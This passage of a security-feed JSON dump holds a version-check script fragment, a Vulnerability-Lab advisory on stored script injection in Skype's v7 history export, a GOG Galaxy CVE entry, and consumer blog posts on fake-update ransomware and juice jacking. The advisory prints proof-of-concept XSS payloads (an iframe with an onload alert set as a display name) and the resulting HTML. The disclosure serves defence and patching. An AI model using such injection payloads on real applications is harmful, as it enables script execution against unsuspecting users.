\"9.14.1\", test_version2: \"9.14.7\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"9.14.8\");\n security_message(port: port, data: report, proto: proto);\n exit(0);\n }\n\n if (version_in_range(version: version, test_version: \"9.15.0\", test_version2: \"9.15.5\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"9.15.6\");\n security_message(port: port, data: report, proto: proto);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "vulnerlab": [{"lastseen": "2019-11-22T03:25:59", "bulletinFamily": "exploit", "description": "", "modified": "2019-11-22T00:00:00", "published": "2019-11-22T00:00:00", "id": "VULNERLAB:2187", "href": "http://www.vulnerability-lab.com/get_content.php?id=2187", "title": "Skype v8.x - History Export v7 Web Vulnerability", "type": "vulnerlab", "sourceData": "Document Title:\r\n===============\r\nSkype v8.x - History Export v7 Web Vulnerability\r\n\r\n\r\nReferences (Source):\r\n====================\r\nhttps://www.vulnerability-lab.com/get_content.php?id=2187\r\n\r\nVulnerability Magazine: https://www.vulnerability-db.com/?q=articles/2019/08/11/skype\r\n\r\nMSRC: VULN-007910\r\n\r\n\r\nRelease Date:\r\n=============\r\n2019-11-22\r\n\r\n\r\nVulnerability Laboratory ID (VL-ID):\r\n====================================\r\n2187\r\n\r\n\r\nCommon Vulnerability Scoring System:\r\n====================================\r\n4.3\r\n\r\n\r\nVulnerability Class:\r\n====================\r\nScript Code Injection\r\n\r\n\r\nCurrent Estimated Price:\r\n========================\r\n1.000\u20ac - 2.000\u20ac\r\n\r\n\r\nProduct & Service Introduction:\r\n===============================\r\nSkype is a telecommunications application that specializes in providing video chat and voice calls between computers, tablets, \r\nmobile devices, the Xbox One console, and smartwatches via the Internet. Skype also provides instant messaging services. Users may \r\ntransmit text, video, audio and images. Skype allows video conference calls. At the end of 2010, there were over 660 million worldwide \r\nusers, with over 300 million estimated active each month as of August 2015. At one point in February 2012, there were 34 million \r\nusers concurrently online on Skype.\r\n\r\n(Copy of the Homepage: https://en.wikipedia.org/wiki/Skype )\r\n\r\n\r\nAbstract Advisory Information:\r\n==============================\r\nThe vulnerability laboratory core research team discovered a persistent vulnerability in skype v8.49.0.49 and older versions.\r\n\r\n\r\nVulnerability Disclosure Timeline:\r\n==================================\r\n2019-11-22: Public Disclosure (Vulnerability Laboratory)\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nRemote\r\n\r\n\r\nSeverity Level:\r\n===============\r\nMedium\r\n\r\n\r\nAuthentication Type:\r\n====================\r\nRestricted authentication (user/moderator) - User privileges\r\n\r\n\r\nUser Interaction:\r\n=================\r\nLow User Interaction\r\n\r\n\r\nDisclosure Type:\r\n================\r\nResponsible Disclosure Program\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\nA persistent script code injection vulnerability has been discovered in the skype v8.49.0.49 software.\r\n\r\nSkype has a new export function for the skype v7.x contents and messages. Users are able to export the old logs \r\nto generate a html file inside the browser with the exported content of the main.db file in combination with the \r\njournal file. The content is rendered and generated in the local installed standard browser without much usage \r\nof physical capacity.\r\n\r\nIn an earlier version of skype a researchers regular skype name was formated as script code payload with iframe. \r\nThe payload was saved inside of my old v7.x profile. After the researcher noticed the newst version allows to \r\nexport the old logs, he used his profile with the payload in the username to open the export via main.db file. \r\nFrom the main db file a html file is generated that uses the name and the username of the v7.x entries to display \r\n(old conversations). This name output is displayed without safe encode / parse mechanism for special chars. In the \r\nmoment the payload becomes visible the execution takes place though the newst skype version v8.x\r\n\r\nSkype itself dumps the conversation content from separate html files generated in the skype-export path of the \r\nsystem user account. Thus could lead as well to the manipulation of the local files that are not checking the \r\nvalidity or authority of the contents when transmitting. Also there is not check that those files are not \r\nmanipulated at all including executable java-script code and html elements. Normally a check ensures that the \r\ngenerated files of the export function does not contain malformed executable codes. The generated files itself \r\nshould be checked on side of the software to approve for specific manipulation attempts locally.\r\n\r\nFinally the issue allows a remote attacker to send with skype v7.x messages as html or js script code that allows \r\nto transmit for example a messages export script, redirect to malicious sources, malware downloader or manipulated \r\nthe exported messages itself. Then the attacker only waits, until the targeted user exports the file from the main.db \r\nand opens it unrestricted in the web-browser to execute. The same case of scenario is possible when the account is \r\nalready updated to skype version v8.49.0.49 and older from skype v7 containing the already send message by the attacker.\r\n\r\nThe vulnerability can be exploited by remote attackers with local low user interaction of a skype user account.\r\nThe vulnerability has been tested and verified from microsoft skype v7.x up to client version v8.49.0.49. \r\nExploitation of the vulnerability results in persistent manipulation of the exported html file, external malicious \r\nredirect, download of malicious sources, phishing attacks (messages/crdentials) or cross site scripting attacks.\r\n\r\nVulnerable Client(s):\r\n[+] Skype v8.49.0.49 and older v8.x versions\r\n\r\nVulnerable Module(s):\r\n[+] History Export\r\n\r\nAffected File(s):\r\n[+] index.html (Archived Conversations)\r\n[+] main.db\r\n\r\nAttacker Client(s):\r\n[+] Skype v7.x (Creation of Profile)\r\n\r\n\r\nProof of Concept (PoC):\r\n=======================\r\nThe security vulnerability can be exploited by remote attackers with low user interaction.\r\nFor security demonstration or to reproduce the issue follow the provided information and steps below to continue. \r\n\r\n\r\nManual steps to reproduce the vulnerability ... (Local PoC)\r\n1. Open in a first step the skype 7.x version\r\n2. Change in a second step the visible name to a test payload (script code)\r\nNote: <a href=\".[USERNAME][GENERATED FROM ARCHIVE FILE].html\">>\"%20[SPLIT]\"\"><[INJECTED SCRIPT CODE PAYLOAD AS DISPLAY NAME]>%20%20 (USERNAME)</a>\r\n3. Save the name and now upgrade to version v8.x\r\n4. Open your skype with the upgraded installation from v7.x to the newst skype v8.x\r\n5. Move to the settings and open the messages tab\r\n6. Choose the History Export Function for Skype v7.x\r\n7. Generate the file via main.db of skype\r\n8. The standard browser opens automatically with the generated archived conversations of skype v7.x html file\r\n9. The injected script code executes in the moment the content loads in the html template\r\n10. Successful reproduce of the vulnerability!\r\n\r\n\r\nManual steps to reproduce the vulnerability ... (Remote PoC)\r\n1. Open in a first step the skype 7.x version\r\n2. Send a script code text message to the target test account\r\nNote: Using a simple iframe, img with source and on element\r\nPayload: <a href=\".[USERNAME][GENERATED FROM ARCHIVE FILE].html\">>\"%20[SPLIT]\"\"><[INJECTED SCRIPT CODE PAYLOAD AS DISPLAY NAME]>%20%20 (USERNAME)</a>\r\n3. Wait until the target user account exorts the old message content locally and opens the file\r\nNote: The malicious interaction takes place when he opens the exact malformed message-body content\r\n4. Successful reproduce of the vulnerability!\r\n\r\n\r\n\r\nPoC: Example\r\n<a href=\".[USERNAME][GENERATED FROM ARCHIVE FILE].html\">>\"%20[SPLIT]\"\"><[INJECTED SCRIPT CODE PAYLOAD AS DISPLAY NAME]>%20%20 (USERNAME)</a>\r\n\r\n\r\n--- Session Logs (GET) ---\r\nhttps://www.vuln-lab.com/\r\nHost: www.vuln-lab.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de,en-US;q=0.7,en;q=0.3\r\nAccept-Encoding: gzip, deflate, br\r\nConnection: keep-alive\r\nUpgrade-Insecure-Requests: 1\r\n\r\n\r\n--- PoC Source (Archived Conversations 7.x - main.db - Listing)---\r\n<!DOCTYPE html>\r\n<html>\r\n <head>\r\n <title>Archived conversations</title>\r\n <meta charset=\"utf-8\">\r\n </head>\r\n<body>\r\n <div class=\"header\">\r\n <h1 class=\"conversations\">Archived conversations</h1>\r\n <ul class=\"exported-accounts\" id=\"accounts\">\r\n<li class=\"account\">\r\n <a href=\".rm.01xindex.html\">>\"%20\"\"><iframe src=https://www.vuln-lab.com onload=alert(\"TEST\")>%20%20</iframe> (rm.01x)</a>\r\n </li>\r\n </ul>\r\n </body>\r\n</html>\r\n\r\n\r\n--- PoC Source (Archived Conversations 7.x - main.db - Conversation)---\r\n<li class=\"message\" id=\"XXXXX\">\r\n<div>\r\n<span class=\"author\"><iframe src=https://www.vuln-lab.com onload=alert(\"TEST\")>%20%20</iframe>[INJECTED SCRIPT CODE TEST PAYLOAD!]</span>\r\n<span class=\"timestamp\">11.7.2018 15:27:57</span>\r\n</div>\r\n<div class=\"message-body\"><div class=\"uri-object\">This is a Skype Archive Conversation Message of main.db ;)</div></div>\r\n</li>\r\n<li class=\"message\" id=\"XXXXX\" >\r\n<div>\r\n<span class=\"author\"><iframe src=https://www.vuln-lab.com onload=alert(\"TEST\")>%20%20</iframe>[INJECTED SCRIPT CODE TEST PAYLOAD!]</span>\r\n<span class=\"timestamp\">11.7.2018 15:28:11</span>\r\n</div>\r\n<div class=\"message-body\">kommt anscheinend durch somhow</div>\r\n</li></ul>\r\n</body>\r\n</html>\r\n</iframe></div></div></li>\r\n\r\n\r\nSolution - Fix & Patch:\r\n=======================\r\nThe vulnerability can be resolved by escaping the output location with the name, author & message-body \r\nvariables correctly to prevent malicious script code execution attacks like cross site scripting, extern \r\nredirect, download of malware from external sources or persistent manipulation of the affected \r\nexport html module.\r\n\r\nNote: Upgrade to skype v8.54.0.91 to resolve the issue permanently. The creation of v7 profiles \r\nvia client is not anymore possible.\r\nAn alternative way would be to delete your local old v7 profile files that can still be imported to ensure.\r\n\r\n\r\nSecurity Risk:\r\n==============\r\nThe security risk of the persistent script code injection web vulnerability is estimated as medium. The exploitation is \r\nlimited to group/multi-user accounts and specific requirements as conditions to successfully exploit.\r\n\r\n\r\nCredits & Authors:\r\n==================\r\nVulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab\r\n\r\n\r\nDisclaimer & Information:\r\n=========================\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, \r\neither expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab \r\nor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits \r\nor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do \r\nnot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. \r\nWe do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.\r\n\r\nDomains: www.vulnerability-lab.com\t\twww.vuln-lab.com\t\t\t\twww.vulnerability-db.com\r\nServices: magazine.vulnerability-lab.com\tpaste.vulnerability-db.com \t\t\tinfosec.vulnerability-db.com\r\nSocial:\t twitter.com/vuln_lab\t\tfacebook.com/VulnerabilityLab \t\t\tyoutube.com/user/vulnerability0lab\r\nFeeds:\t vulnerability-lab.com/rss/rss.php \tvulnerability-lab.com/rss/rss_upcoming.php \tvulnerability-lab.com/rss/rss_news.php\r\nPrograms: vulnerability-lab.com/submit.php \tvulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php\r\n\r\nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. \r\nPermission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other \r\nmedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other \r\ninformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or \r\nedit our material contact (admin@ or research@) to get a ask permission.\r\n\r\n\t\t\t\t Copyright \u00a9 2019 | Vulnerability Laboratory - [Evolution Security GmbH]\u2122\r\n\r\n\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2019-11-22T12:23:34", "bulletinFamily": "NVD", "description": "An exploitable local privilege escalation vulnerability exists in the GalaxyClientService installed by GOG Galaxy. Due to Improper Access Control, an attacker can send unauthenticated local TCP packets to the service to gain SYSTEM privileges in Windows system where GOG Galaxy software is installed. All GOG Galaxy versions before 1.2.60 and all corresponding versions of GOG Galaxy 2.0 Beta are affected.", "modified": "2019-11-21T18:48:00", "id": "CVE-2019-15511", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-15511", "published": "2019-11-21T18:15:00", "title": "CVE-2019-15511", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}], "trendmicroblog": [{"lastseen": "2019-11-21T18:29:39", "bulletinFamily": "blog", "description": "![Mobile devices could be the biggest ransomware threat.](https://blog.trendmicro.com/wp-content/uploads/2017/08/Mobile-devices-could-be-the-biggest-ransomware-threat_459_40163488_0_14127427_500-300x200.jpg)\n\nMicrosoft never sends updates via email. Many folks don\u2019t know that, which is why a new ransomware campaign masquerading as a Windows 10 update is so pernicious.\n\nYou may have already gotten a fake notice saying \u201cInstall Latest Microsoft Update Now!\u201d Or \u201cCritical Microsoft Windows Update!\u201d, with the body of the message asking you to \u201cPlease install the latest critical update from Microsoft attached to this mail,\u201d with an apparent JPG file attached, (which is actually an executable .NET file).\n\nDo NOT click on the attachment and delete the email immediately.\n\nThe file is a ransomware called Cyborg, which will encrypt all your files, lock their contents, and change their extensions to 777. As is typical of ransomware, you\u2019ll also be delivered a file named \u201cCyborg_DECRYPT.txt,\u201d which contains the instructions on how you can recover your files\u2014_if_ you pay the cybercriminal. You should _never_ do that. There\u2019s no guarantee that even if you fork over the cash, the cybercriminals will release your computer.\n\nTrustware, which discovered the ransomware, says four variants are out there, spawned from somewhere in Russia, so you should be on the lookout for variations to the email notice, including those that are attached to other emails. The ransomware has the capacity to evade gateway controls.\n\nKeep in mind that it\u2019s always a best practice to be _very_ cautious about unknown mails you get, and even those \u201capparently\u201d from people you know, and never click on enclosed files in email unless you\u2019re 100% sure of its source (which means: you need to make a separate effort to check it).\n\nIf you\u2019re already infected, go to our [Ransomware Prevention and Help](<https://esupport.trendmicro.com/en-us/home/pages/technical-support/maximum-security/1099580.aspx?cm_mmc=iKB-_-Ransomware_help-_-TEG0-_-EN-US>) page from another computer to get help. From there, you can contact our [Technical Support](<https://esupport.trendmicro.com/en-us/home/pages/technical-support/maximum-security/1099580.aspx?cm_mmc=iKB-_-Ransomware_help-_-TEG0-_-EN-US#myModal>) for further assistance.\n\nKnow too, that [Trend Micro Security](<https://www.trendmicro.com/en_us/forHome/products/maximum-security.html>) has built-in protections against ransomware. Its [Folder Shield](<https://www.youtube.com/watch?v=Gh-0bKDBcCc&list=PLZm70v-MT4JrrjgguJYCNR8yNjGq0swB3&index=10>) protection can help stop it in its tracks from encrypting your precious files, as you can see in our video we\u2019ve linked here.\n\nWhen it comes to ransomware outbreaks, you can _never_ be too cautious. Stay alert! Hoaxed emails can take many forms.\n\n \n\nThe post [Warning! Windows 10 Fake Update is Actually Ransomware](<https://blog.trendmicro.com/warning-windows-10-fake-update-is-actually-ransomware/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2019-11-21T16:27:31", "published": "2019-11-21T16:27:31", "id": "TRENDMICROBLOG:A945F3BF130B3EBF81C9BAB217460EB7", "href": "https://blog.trendmicro.com/warning-windows-10-fake-update-is-actually-ransomware/", "type": "trendmicroblog", "title": "Warning! Windows 10 Fake Update is Actually Ransomware", "cvss": {"score": 0.0, "vector": "NONE"}}], "malwarebytes": [{"lastseen": "2019-11-21T16:21:59", "bulletinFamily": "blog", "description": "When your battery is dying and you're nowhere near a power outlet, would you connect your phone to any old USB port? Joyce did, and her mobile phone got infected. How? Through a type of cyberattack called \"juice jacking.\" Don\u2019t be like Joyce. \n\nAlthough Joyce and her infected phone are hypothetical, juice jacking is technically possible. The attack uses a charging port or infected cable to exfiltrate data from the connected device or upload malware onto it. The term was first used by [Brian Krebs](<https://krebsonsecurity.com/2011/08/beware-of-juice-jacking/>) in 2011 after a [proof of concept was conducted at DEF CON by Wall of Sheep](<https://www.wallofsheep.com/pages/juice>). When users plugged their phones into a free charging station, a message appeared on the kiosk screen saying:\n\n> \u201cYou should not trust public kiosks with your smart phone. Information can be retrieved or downloaded without your consent. Luckily for you, this station has taken the ethical route and your data is safe. Enjoy the free charge!\u201d\n\nAs peak holiday travel season approaches, [officials have issued public warnings](<http://da.co.la.ca.us/community/fraud-alerts/juice-jacking-criminals-use-public-usb-chargers-steal-data>) about charging phones via USB using public charging stations in airports and hotels, as well as pluggable USB wall chargers, which are portable charging devices that can be plugged into an AC socket. However, this attack method [has not been documented in the wild](<https://techcrunch.com/2019/11/15/los-angeles-juice-jacking-usb/>), outside of a few unconfirmed reports on the east coast and in the Washington, DC, area.\n\nInstead of worrying about juice jacking this holiday season, we recommend you follow our guidance on [best cybersecurity practices while traveling](<https://blog.malwarebytes.com/security-world/2018/06/tips-safe-summer-travels-cybersecurity-checklist/>). We've also written articles on how to [protect your Android](<https://blog.malwarebytes.com/101/2018/03/10-ways-to-protect-your-android-phone/>), as well as how to [protect your iOS phone](<https://blog.malwarebytes.com/101/2018/05/seven-security-tips-staying-safe-iphone/>).\n\nStill, it's best to be aware of potential modes of cyberattack\u2014you never know what will trigger the transformation of the hypothetical to the real. To avoid inadvertently infecting your mobile device while charging your phone in public, learn more about how these attacks could happen and what you can do to prevent them. \n\n\n### How would juice jacking work?\n\nAs you may have noticed, when you charge your phone through the USB port of your computer or laptop, this also opens up the option to move files back and forth between the two systems. That's because a USB port is not simply a power socket. A regular USB connector has five pins, where only one is needed to charge the receiving end. Two of the others are used by default for data transfers.\n\n![USB connection table](https://blog.malwarebytes.com/wp-content/uploads/2019/11/USB_5_pins.png)_USB connection table courtesy of Sunrom_\n\nUnless you have made changes in your settings, the data transfer mode is disabled by default, except on devices running older Android versions. The connection is only visible on the end that provides the power, which in the case of juice jacking is typically not the device owner. That means, anytime a user connects to a USB port for a charge, they could also be opening up a pathway to move data between devices\u2014a capability threat actors could abuse to steal data or install malware. \n\n### Types of juice jacking\n\nThere are two ways juice jacking could work:\n\n * **Data theft:** During the charge, data is stolen from the connected device. \n * **Malware installation:** As soon as the connection is established, malware is dropped on the connected device. The malware remains on the device until it is detected and removed by the user.\n\n#### Data theft\n\nIn the first type of juice-jacking attack, cybercriminals could steal any and all data from mobile devices connected to charging stations through their USB ports. But there's no hoodie-wearing hacker sitting behind the controls of the kiosk. So how would they get all your data from your phone to the charging station to their own servers? And if you charge for only a couple minutes, does that save you from losing everything? \n\nMake no mistake, data theft can be fully automated. A cybercriminal could breach an unsecured kiosk using malware, then drop an additional payload that steals information from connected devices. There are crawlers that can search your phone for [personally identifiable information](<https://blog.malwarebytes.com/security-world/2019/04/what-is-personal-information-in-legal-terms-it-depends/>) (PII), account credentials, banking-related or credit card data in seconds. There are also many malicious apps that can clone all of one phone's data to another phone, using a Windows or Mac computer as a middleman. So, if that\u2019s what hiding on the other end of the USB port, a threat actor could get all they need to impersonate you. \n\nCybercriminals are not necessarily targeting specific, high-profile users for data theft, either\u2014though a threat actor would be extremely happy (and lucky) to fool a potential executive or government target into using a rigged charging station. However, the chances of that happening are rather slim. Instead, hackers know that our mobile devices store a lot of PII, which can be sold on the dark web for profit or re-used in [social engineering](<https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2018/08/social-engineering-attacks-what-makes-you-susceptible/>) campaigns.\n\n#### Malware installation\n\nThe second type of juice-jacking attack would involve installing malware onto a user's device through the same USB connection. This time, data theft isn't always the end goal, though it often takes place in the service of other criminal activities. If threat actors were to steal data through malware installed on a mobile device, it wouldn't happen upon USB connection but instead take place over time. This way, hackers could gather more and varied data, such as GPS locations, purchases made, social media interactions, photos, call logs, and other ongoing processes.\n\nThere are many categories of malware that cybercriminals could install through juice jacking, including adware, cryptominers, ransomware, spyware, or Trojans. In fact, [Android malware](<https://blog.malwarebytes.com/android/2019/11/stealthy-new-android-malware-poses-as-ad-blocker-serves-up-ads-instead/>) nowadays is as versatile as malware aimed at Windows systems. While [cryptominers](<https://blog.malwarebytes.com/threat-analysis/2018/02/drive-by-cryptomining-campaign-attracts-millions-of-android-users/>) mine a mobile phone's CPU/GPU for cryptocurrency and drain its battery, [ransomware](<https://blog.malwarebytes.com/threats/mobile-ransomware/>) freezes devices or encrypts files for ransom. [Spyware](<https://blog.malwarebytes.com/stalkerware/2019/10/how-to-protect-against-stalkerware-a-murky-but-dangerous-mobile-threat/>) allows for longterm monitoring and tracking of a target, and [Trojans](<https://blog.malwarebytes.com/android/2019/08/mobile-menace-monday-android-trojan-raises-xhelper/>) can hide in the background and serve up any number of other infections at will. \n\nMany of today's malware families are designed to hide from sight, so it's possible users could be infected for a long time and not know it. Symptoms of a [mobile phone infection](<https://blog.malwarebytes.com/101/2016/05/how-to-tell-if-youre-infected-with-malware/>) include a quickly-draining battery life, random icons appearing on your screen of apps you didn't download, advertisements popping up in browsers or notification centers, or an unusually large cell phone bill. But sometimes infections leave no trace at all, which means prevention is all the more important.\n\n### Countermeasures\n\nThe first and most obvious way to avoid juice jacking is to stay away from public charging stations or portable wall chargers. Don\u2019t let the panic of an almost drained battery get the best of you. I\u2019m probably showing my age here, but I can keep going without my phone for hours. I\u2019d rather not see the latest kitty meme if it means compromising the data on my phone. \n\nIf going without a phone is crazy talk and a battery charge is necessary to get you through the next leg of your travels, using a good old-fashioned AC socket (plug and outlet) will do the trick. No data transfer can take place while you charge\u2014though it may be hard to find an empty outlet. While traveling, make sure you have the correct adapter for the various power outlet systems along your route. Note there are 15 major types of electrical outlet plugs in use today around the globe. \n\nOther non-USB options include external batteries, wireless charging stations, and power banks, which are devices that can be charged to hold enough power for several recharges of your phone. Depending on the type and brand of power bank, they can hold between two and eight full charges. Power banks with a high capacity are known to cost more than US$100, but offer the option to charge multiple devices without having to look for a suitable power outlet.\n\nIf you still want the option to connect via USB, USB condoms are adaptors that allow the power transfer but don\u2019t connect the data transfer pins. You can attach them to your charging cable as an \u201calways on\u201d protection.\n\n![usb condom](https://blog.malwarebytes.com/wp-content/uploads/2019/11/USB_condom.png)_Image courtesy of int3.cc_\n\nUsing such a USB data blocker or \"juice-jack defender\" as they are sometimes called will always prevent accidental data exchange when your device is plugged into another device with a USB cable. This makes it a welcome travel companion, and will only set you back US$10\u2013$20.\n\nChecking your phones' USB preference settings may help, but it's not a fool-proof solution. There have been cases where data transfers took place despite the \"no data transfer\" setting.\n\nFinally, avoid using any charging cables and power banks that seem to be left behind. You can compare this trick to the \u201clost USB stick\u201d in the parking lot. You know you shouldn\u2019t connect those to your computer, right? Consider any random technology left behind as suspect. Your phone will thank you for it.\n\nStay safe, everyone! \n\nThe post [Explained: juice jacking](<https://blog.malwarebytes.com/explained/2019/11/explained-juice-jacking/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2019-11-21T16:00:00", "published": "2019-11-21T16:00:00", "id": "MALWAREBYTES:06ED86BC5FE8565621F6AE9C50A76CB4", "href": "https://blog.malwarebytes.com/explained/2019/11/explained-juice-jacking/", "type": "malwarebytes", "title": "Explained: juice jacking", "cvss": {"score": 0.0, "vector": "NONE"}}]}